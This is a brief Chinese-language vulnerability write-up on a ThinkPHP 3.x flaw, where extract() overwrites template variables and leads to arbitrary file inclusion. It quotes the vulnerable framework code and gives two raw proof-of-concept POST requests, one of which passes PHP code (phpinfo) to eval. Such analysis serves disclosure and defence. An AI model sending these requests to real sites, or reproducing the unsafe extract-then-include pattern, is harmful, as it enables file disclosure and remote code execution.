thinkphp 3.x下的任意檔案包含(有條件)分析
漏洞原理
實現自己的模版引擎不當,在模版渲染的情況下存在任意變數覆蓋漏洞。。
漏洞詳情
漏洞位置1
ThinkPHP/Library/Think/View.class.php
需要修改配置檔案 指定TMPL_ENGINE_TYPE為php
if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板
// 模板陣列變數分解成為獨立變數
extract($this->tVar, EXTR_OVERWRITE);
// 直接載入PHP模板
empty($content)?include $templateFile:eval('?>'.$content);
漏洞位置2
ThinkPHP/Library/Think/Storage/Driver/File.class.php
/**
* 載入檔案
* @access public
* @param string $filename 檔名
* @param array $vars 傳入變數
* @return void
*/
public function load($filename,$vars=null){
if(!is_null($vars))
extract($vars, EXTR_OVERWRITE);
include $filename;
}
漏洞復現
漏洞服務端程式碼:
public function test(){
$this->assign($_POST);
echo $this->fetch();
}
漏洞驗證請求:對於漏洞位置2
POST /onethink/index.php?s=/Home/Article/test HTTP/1.1
Host: 192.168.1.24
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
filename=license.txt
呼叫堆疊
漏洞驗證請求:對於漏洞位置1 ,可以命令執行
POST /onethink/index.php?s=/Home/Article/test HTTP/1.1
Host: 192.168.1.24
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
content=<?php phpinfo();
呼叫堆疊
參考:
https://mp.weixin.qq.com/s/IuKjTS0Q0VVzuoeSwqZ5Gw